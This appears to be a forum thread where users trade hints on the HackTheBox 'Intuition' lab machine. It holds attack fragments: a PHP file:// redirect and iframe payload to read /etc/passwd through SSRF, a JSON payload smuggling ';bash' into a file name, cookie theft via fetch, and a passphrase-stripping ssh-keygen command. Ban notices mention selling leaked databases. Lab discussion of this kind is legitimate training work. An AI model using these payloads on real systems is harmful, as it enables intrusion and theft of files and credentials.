sudo ssh-keygen -p -P 'Y27SH19HDIWD" -N "" -m pem -f ./private.txt --> whitout password...
|
HTB- Intuition
by trevor69000 - Saturday April 27, 2024 at 06:46 PM
|
|
Apr 30, 2024, 06:25 PM
Hi any way to get through ssrf?
$ cat lfi.php <?php header('location:file://'.$_REQUEST['x']); ?> $ cat index.html <!DOCTYPE html> <html lang=en> <body> <iframe src="http://10.10.14.3/lfi.php?x=/etc/passwd" height=1000px width=1000px></iframe> </body> </html> i get a Frame load interrupted by policy change, tried adding spaces and other things said by CVE-2023-24329 but i can't seem to read any file (Apr 30, 2024, 06:25 PM)archnet Wrote: Hi any way to get through ssrf? "Frame load interrupted by policy change " issue - try using php http server instead of python LFI - don't use the lfi from pdfy htb challenge albeit the concept is related, lfi script is not. someone in the previous thread has mentioned the right lfi for the intuition challenge.
May 01, 2024, 09:38 AM
(Apr 29, 2024, 02:42 PM)macavitysworld Wrote:(Apr 29, 2024, 02:30 PM)laranja Wrote: For those who are having difficulties, this is how I managed I keep getting "Error parsing JSON data". I downloaded the .tar and renamed it to 'sys-admins-role.tar;bash' I created a .json with { "run": { "action": "install", "role_file": "sys-admins-role.tar;bash", }, "auth_code": "UHI75GHINKOP" } Wtf am I doing wrong? What am I missing?
May 01, 2024, 09:42 AM
(May 01, 2024, 09:38 AM)paro Wrote:(Apr 29, 2024, 02:42 PM)macavitysworld Wrote:(Apr 29, 2024, 02:30 PM)laranja Wrote: For those who are having difficulties, this is how I managed Dm me on tg/discord @macavitysworld
May 01, 2024, 10:03 AM
Guys i have a question can we bypass windows 11 firewall and real time protection to get a reverse shell ?
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
May 01, 2024, 11:00 PM
(This post was last modified: May 01, 2024, 11:02 PM by Hercobolus.)
I am at the same point. Can someone please explain how to exchange that cookie? I used a cookie editor plugin on firefox. I set it for dashboard.comprezzor.htb right? But I also end up at the login page. Maybe someone can help here or PM me.
I am at the first cookie I have via "fetch" and http.server
May 02, 2024, 06:51 AM
interesting indeed
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Selling public data /Thread-SELLING-WDC-Q4-Chinese-Immigration-database /Thread-Facebook-Database-Leaked-Download /Thread-SELLING-Indonesian-Ministry-of-Transportation-Full-Employees-Database
May 03, 2024, 05:27 PM
(Apr 29, 2024, 02:42 PM)macavitysworld Wrote:(Apr 29, 2024, 02:30 PM)laranja Wrote: For those who are having difficulties, this is how I managed im getting invalid tar archive errors while using that, but without the ;bash it runs correctly, why would that be? heres the json im runnin with right now "run":{ "action":"install", "role_file":"sys-admins-role.tar; bash" }, "auth_code":"UHI75GHINKOP" } |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] CPTS 12 FLAGS | 68 | 1,929 |
6 hours ago Last Post: VictorPipeau |
||
| [FREE] HackTheBox Dante - complete writeup written by Tamarisk | 601 | 91,530 |
6 hours ago Last Post: VictorPipeau |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 371 | 92,796 |
7 hours ago Last Post: phannguyenbaouy1 |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 21 | 2,611 |
10 hours ago Last Post: popoler |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,268 |
Yesterday, 02:10 PM Last Post: kkkato |
||
